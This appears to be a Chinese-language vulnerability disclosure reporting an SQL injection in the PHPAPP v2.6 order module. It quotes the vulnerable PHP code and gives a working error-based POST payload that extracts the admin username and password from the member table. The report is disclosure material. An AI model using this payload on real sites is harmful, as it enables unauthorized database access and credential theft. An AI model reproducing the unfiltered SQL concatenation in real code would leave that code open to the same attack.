PHPAPP注入第十枚（未过滤）

### 简要描述： PHPAPP注入第十枚（未过滤） ### 详细说明： 在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看(2014-12-11更新的)。 PSOT注入点：wwww.xxx.com/member.php?app=48&op=4&action=1, 存在漏洞的文件在/phpapp/apps/order/member_phpapp.php 随意注册个账号即可测试 来看看漏洞是如何产生的/phpapp/apps/order/member_phpapp.php ``` if($this->GET['op']==4){ if($this->POST['Submit']){ $content=$this->POST['content']; $oid=intval($oderid); $this->Update('task_order',array('content'=>$content),array()," WHERE oid='$oid'"); //文件 $files=$this->UploadFile(); if($files){ foreach($files as $fid){ $this->Insert('apps_file',array('appid'=>$this->app,'fid'=>$fid,'uid'=>$this->uid,'id'=>$oid,'type'=>3),array()); } $this->ReplaceFileContent($files,'task_order',$content," WHERE oid='$oid' "); } echo '上传成功！'; echo $this->CloseNowWindows('#loading',1); } } ``` 用户提交的content 没有经过过滤，拼接了sql语句，造成了注入。 Phpapp可以显错，那就用error-based blind进行注入。 Pyload：(POST提交) ``` Submit=1&content=1' or (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x23,username,0x23,password) from phpapp_member limit 0,1))a from phpapp_member group by a)b) or' ``` 注入成功，管理员用户名及密码如下图中所示： [<img src="https://images.seebug.org/upload/201412/23235747caddfdfa3a066964a8ef3c61532fad5c.jpg" alt="注入成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/23235747caddfdfa3a066964a8ef3c61532fad5c.jpg) ### 漏洞证明： 见 详细说明